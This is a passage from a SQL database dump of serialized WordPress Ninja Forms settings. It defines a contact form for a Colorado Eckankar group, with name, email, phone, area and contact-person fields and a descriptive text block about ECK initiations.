submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:10:{i:0;s:18:\"html_1515012877904\";i:1;s:23:\"firstname_1515012036721\";i:2;s:22:\"lastname_1515012040393\";i:3;s:19:\"email_1515012046399\";i:4;s:19:\"phone_1515012055554\";i:5;s:29:\"your_local_area_1515013258725\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166502762\";i:7;s:37:\"enter_your_message_here_1515013766874\";i:8;s:18:\"html_1663798119504\";i:9;s:20:\"submit_1515013824829\";}s:19:\"changeEmailErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(15,'a:7:{s:2:\"id\";i:15;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:10:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:1249:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Longmont Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:1247:\"<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Longmont Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>\";s:3:\"key\";s:8:\"html_129\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_129\";}s:2:\"id\";i:154;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_130\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_130\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:155;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_131\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_131\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:156;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_132\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_132\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:157;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"phone_133\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:9:\"phone_133\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:158;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:14:\"listselect_134\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:14:\"listselect_134\";}s:2:\"id\";i:159;}i:6;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:43:\"Select The Person You Would Like To Contact\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:4:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please 